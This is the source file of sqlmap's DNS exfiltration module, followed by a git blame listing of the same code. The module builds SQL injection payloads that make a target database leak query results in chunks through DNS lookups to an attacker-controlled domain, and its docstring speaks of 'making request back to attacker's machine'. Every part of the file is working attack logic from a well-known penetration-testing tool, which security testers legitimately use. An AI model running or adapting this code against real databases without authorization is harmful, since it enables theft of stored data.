sqlmap/lib/techniques/dns/use.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re
import time

from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeDbmsHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.compat import xrange
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
from lib.utils.safe2bin import safecharencode

def dnsUse(payload, expression):
    """
    Retrieve the output of a SQL query taking advantage of the DNS
    resolution mechanism by making request back to attacker's machine.
    """

    start = time.time()

    retVal = None
    count = 0
    offset = 1

    if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
        output = hashDBRetrieve(expression, checkConf=True)

        if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
            output = None

        if output is None:
            kb.dnsMode = True

            while True:
                count += 1
                prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))
                chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2
                _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
                nulledCastedField = agent.nullAndCastField(fieldToCastStr)
                extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0)
                if extendedField != fieldToCastStr:  # e.g. MIN(surname)
                    nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)
                    fieldToCastStr = extendedField
                nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
                nulledCastedField = agent.hexConvertField(nulledCastedField)
                expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)

                expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)
                expressionUnescaped = unescaper.escape(expressionRequest)

                if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
                    query = agent.prefixQuery("; %s" % expressionUnescaped)
                    query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query)
                    forgedPayload = agent.payload(newValue=query)
                else:
                    forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))

                Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)

                _ = conf.dnsServer.pop(prefix, suffix)

                if _:
                    _ = extractRegexResult(r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)
                    _ = decodeDbmsHexValue(_)
                    output = (output or "") + _
                    offset += len(_)

                    if len(_) < chunk_length:
                        break
                else:
                    break

            output = decodeDbmsHexValue(output) if conf.hexConvert else output

            kb.dnsMode = False

        if output is not None:
            retVal = output

            if kb.dnsTest is not None:
                dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))

                if count > 0:
                    hashDBWrite(expression, output)

        if not kb.bruteMode:
            debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start))
            logger.debug(debugMsg)

    elif conf.dnsDomain:
        warnMsg = "DNS data exfiltration method through SQL injection "
        warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms()
        singleTimeWarnMessage(warnMsg)

    return safecharencode(retVal) if kb.safeCharEncode else retVal
Last preparations for DREI 2019-05-08 13:47:52 +03:00			`#!/usr/bin/env python`
laying foundation for DNS based data retrieval 2012-03-27 22:59:12 +04:00
			`"""`
Update regarding #4795 2021-09-08 22:01:41 +03:00			`Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)`
Replacing doc/COPYING to LICENSE 2017-10-11 15:50:46 +03:00			`See the file 'LICENSE' for copying permission`
laying foundation for DNS based data retrieval 2012-03-27 22:59:12 +04:00			`"""`

further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`import re`
			`import time`

			`from lib.core.agent import agent`
			`from lib.core.common import Backend`
			`from lib.core.common import calculateDeltaSeconds`
			`from lib.core.common import dataToStdout`
Stabilizing DREI 2019-05-03 14:20:15 +03:00			`from lib.core.common import decodeDbmsHexValue`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`from lib.core.common import extractRegexResult`
refactoring for issue #51 2012-07-10 03:19:32 +04:00			`from lib.core.common import getSQLSnippet`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`from lib.core.common import hashDBRetrieve`
			`from lib.core.common import hashDBWrite`
			`from lib.core.common import randomInt`
			`from lib.core.common import randomStr`
			`from lib.core.common import safeStringFormat`
			`from lib.core.common import singleTimeWarnMessage`
Some more DREI stuff 2019-03-28 18:04:38 +03:00			`from lib.core.compat import xrange`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
			`from lib.core.data import queries`
			`from lib.core.enums import DBMS`
some more refactoring 2012-07-01 03:19:54 +04:00			`from lib.core.settings import DNS_BOUNDARIES_ALPHABET`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`from lib.core.settings import MAX_DNS_LABEL`
			`from lib.core.settings import PARTIAL_VALUE_MARKER`
			`from lib.core.unescaper import unescaper`
			`from lib.request.connect import Connect as Request`
Minor refactoring 2019-09-11 15:05:25 +03:00			`from lib.utils.safe2bin import safecharencode`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00
			`def dnsUse(payload, expression):`
laying foundation for DNS based data retrieval 2012-03-27 22:59:12 +04:00			`"""`
			`Retrieve the output of a SQL query taking advantage of the DNS`
			`resolution mechanism by making request back to attacker's machine.`
			`"""`

further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`start = time.time()`

			`retVal = None`
			`count = 0`
			`offset = 1`

Minor refactoring 2016-10-22 22:52:18 +03:00			`if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`output = hashDBRetrieve(expression, checkConf=True)`
layout adjustments 2012-04-04 16:27:24 +04:00
minor improvements regarding data retrieval through DNS channel 2012-04-03 13:18:30 +04:00			`if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`output = None`

			`if output is None:`
			`kb.dnsMode = True`

			`while True:`
			`count += 1`
some more refactoring 2012-07-01 03:19:54 +04:00			`prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))`
One more 2to3 baby step 2019-01-22 04:29:52 +03:00			`chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)`
Another patch related to the #1752 2016-03-12 17:04:19 +03:00			`nulledCastedField = agent.nullAndCastField(fieldToCastStr)`
Fixes #1752 2016-03-12 14:26:30 +03:00			`extendedField = re.search(r"[^ ,]%s[^ ,]" % re.escape(fieldToCastStr), expression).group(0)`
			`if extendedField != fieldToCastStr: # e.g. MIN(surname)`
Another patch related to the #1752 2016-03-12 17:04:19 +03:00			`nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)`
Fixes #1752 2016-03-12 14:26:30 +03:00			`fieldToCastStr = extendedField`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)`
			`nulledCastedField = agent.hexConvertField(nulledCastedField)`
			`expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)`

Minor refactoring 2016-10-22 22:52:18 +03:00			`expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain)`
Unescaping is renamed to escaping 2013-01-18 18:40:37 +04:00			`expressionUnescaped = unescaper.escape(expressionRequest)`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00
adding support for PgSQL DNS data exfiltration 2012-04-07 18:06:11 +04:00			`if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):`
minor update 2012-04-02 18:57:15 +04:00			`query = agent.prefixQuery("; %s" % expressionUnescaped)`
Bug fix (stacked queries as in PgSQL and MsSQL DNS tunneling queries MUST end with the comment - not the recognized underlying technique's suffix) 2013-12-26 01:18:57 +04:00			`query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query)`
minor update 2012-04-02 18:57:15 +04:00			`forgedPayload = agent.payload(newValue=query)`
			`else:`
			`forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))`
few fixes regarding --dns-domain usage (time-based technique should not be used as a failback because of few things, --time-sec should be put to 0 just in case,...) 2012-05-28 18:51:23 +04:00
minor update 2012-04-02 18:57:15 +04:00			`Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00
			`_ = conf.dnsServer.pop(prefix, suffix)`
layout adjustments 2012-04-04 16:27:24 +04:00
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`if _:`
Minor code style updates 2018-06-10 00:38:00 +03:00			`_ = extractRegexResult(r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)`
Stabilizing DREI 2019-05-03 14:20:15 +03:00			`_ = decodeDbmsHexValue(_)`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`output = (output or "") + _`
			`offset += len(_)`
layout adjustments 2012-04-04 16:27:24 +04:00
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`if len(_) < chunk_length:`
			`break`
			`else:`
			`break`

Stabilizing DREI 2019-05-03 14:20:15 +03:00			`output = decodeDbmsHexValue(output) if conf.hexConvert else output`
Minor fix 2014-06-27 16:14:29 +04:00
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`kb.dnsMode = False`

			`if output is not None:`
			`retVal = output`
layout adjustments 2012-04-04 16:27:24 +04:00
minor improvements regarding data retrieval through DNS channel 2012-04-03 13:18:30 +04:00			`if kb.dnsTest is not None:`
Minor adjustment 2014-10-01 15:59:51 +04:00			`dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))`
layout adjustments 2012-04-04 16:27:24 +04:00
minor improvements regarding data retrieval through DNS channel 2012-04-03 13:18:30 +04:00			`if count > 0:`
			`hashDBWrite(expression, output)`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00
			`if not kb.bruteMode:`
Minor cosmetics 2020-10-27 16:57:12 +03:00			`debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start))`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`logger.debug(debugMsg)`

Minor refactoring 2016-10-22 22:52:18 +03:00			`elif conf.dnsDomain:`
further update of DNS data retrieval mechanism through SQLi 2012-04-02 18:05:30 +04:00			`warnMsg = "DNS data exfiltration method through SQL injection "`
			`warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms()`
			`singleTimeWarnMessage(warnMsg)`

minor fix 2012-04-03 14:18:03 +04:00			`return safecharencode(retVal) if kb.safeCharEncode else retVal`